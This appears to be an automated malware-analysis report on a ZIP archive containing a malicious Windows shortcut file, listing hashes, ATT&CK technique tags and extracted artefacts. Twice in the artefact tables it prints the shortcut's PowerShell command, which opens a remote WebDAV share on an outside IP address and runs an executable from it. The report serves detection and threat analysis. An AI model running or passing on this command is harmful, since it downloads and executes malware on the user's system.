Malicious
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849[...]fd7.zip
ZIP Archive | MD5: 0986e89bec41533ac56b722bff6aa0fa | Size: 1.06 KB | application/zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Characteristics
Hash | Hash Value |
---|---|
MD5 | 0986e89bec41533ac56b722bff6aa0fa |
Sha1 | 0aebff2cf0de14844fceba56bfc7ef84f42dfcbf |
Sha256 | 70e8f69d36ad1869ae48a74e8f5b757e7c9b74a19231110e8796395385a92872 |
Sha384 | c5bda3de2b9646cc3f7640f7726538969c923feed204a6dcd1845f3aeabb73385d39f20d0d7d69701d45bf557c29d14d |
Sha512 | bfd92f0fa6f9a39e1ecff8ffab008110bbd4d5b07d90fd942539cb65300476741588e35c3101f35e3b90cdd9106dd6bd94e92fa25139f911c638b97110dcd6f3 |
SSDeep | 24:xExNo/wLXnujh8nxHfX8zsrTS8mgttd3DMtYvET:xEn0wLXnuj+yOTS8ldVvET |
TLSH | 2611D85D0ACA1823D453103541ABA19DCF88C238C43AC4B2C72CD47B3FAB2894DB9E25 |
File Structure
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
[Lnk Summary]
Malicious
Artefacts
Name | Value |
---|---|
LNK: Command Execution | powershell.exe -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\1.exe |
Characteristics
No malware configuration was found at this point.
Artefacts
Name | Value | Location |
---|---|---|
LNK: Command Execution | powershell.exe -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\1.exe [Malicious] | d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip > d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.lnk |